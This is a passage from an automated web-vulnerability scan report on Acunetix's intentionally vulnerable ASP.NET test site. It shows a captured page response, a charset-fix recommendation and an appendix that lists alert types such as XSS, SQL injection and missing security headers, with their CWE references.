          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Force UTF-8 for all text content in both the HTTP header and meta tags in HTML or encoding declarations in XML.

Appendix

Alert types

This section contains additional information on the types of alerts in the report.

  1. Cross Site Scripting (Persistent)

    Source raised by an active scanner (Cross Site Scripting (Persistent))
    CWE ID 79
    WASC ID 8
    Reference
    1. http://projects.webappsec.org/Cross-Site-Scripting
    2. http://cwe.mitre.org/data/definitions/79.html
  2. Cross Site Scripting (Reflected)

    Source raised by an active scanner (Cross Site Scripting (Reflected))
    CWE ID 79
    WASC ID 8
    Reference
    1. http://projects.webappsec.org/Cross-Site-Scripting
    2. http://cwe.mitre.org/data/definitions/79.html
  3. SQL Injection

    Source raised by an active scanner (SQL Injection)
    CWE ID 89
    WASC ID 19
    Reference
    1. https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
  4. Viewstate without MAC Signature (Unsure)

    Source raised by a passive scanner (Viewstate)
    CWE ID 642
    WASC ID 14
    Reference
    1. http://msdn.microsoft.com/en-us/library/ff649308.aspx
  5. X-Frame-Options Header Not Set

    Source raised by a passive scanner (X-Frame-Options Header)
    CWE ID 1021
    WASC ID 15
    Reference
    1. https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
  6. Cookie without SameSite Attribute

    Source raised by a passive scanner (Cookie without SameSite Attribute)
    CWE ID 1275
    WASC ID 13
    Reference
    1. https://tools.ietf.org/html/draft-ietf-httpbis-cookie-same-site
  7. Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s)

    Source raised by a passive scanner (Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s))
    CWE ID 200
    WASC ID 13
    Reference
    1. http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx
    2. http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html
  8. Timestamp Disclosure - Unix

    Source raised by a passive scanner (Timestamp Disclosure)
    CWE ID 200
    WASC ID 13
    Reference
    1. http://projects.webappsec.org/w/page/13246936/Information%20Leakage
  9. X-AspNet-Version Response Header

    Source raised by a passive scanner (X-AspNet-Version Response Header)
    CWE ID 933
    WASC ID 14
    Reference
    1. https://www.troyhunt.com/shhh-dont-let-your-response-headers/
    2. https://blogs.msdn.microsoft.com/varunm/2013/04/23/remove-unwanted-http-response-headers/
  10. X-Content-Type-Options Header Missing

    Source raised by a passive scanner (X-Content-Type-Options Header Missing)
    CWE ID 693
    WASC ID 15
    Reference
    1. http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx
    2. https://owasp.org/www-community/Security_Headers
  11. Absence of Anti-CSRF Tokens

    Source raised by a passive scanner (Absence of Anti-CSRF Tokens)
    CWE ID 352
    WASC ID 9
    Reference
    1. http://projects.webappsec.org/Cross-Site-Request-Forgery
    2. http://cwe.mitre.org/data/definitions/352.html
  12. Charset Mismatch (Header Versus Meta Content-Type Charset)

    Source raised by a passive scanner (Charset Mismatch)
    CWE ID 436
    WASC ID 15
    Reference
    1. http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection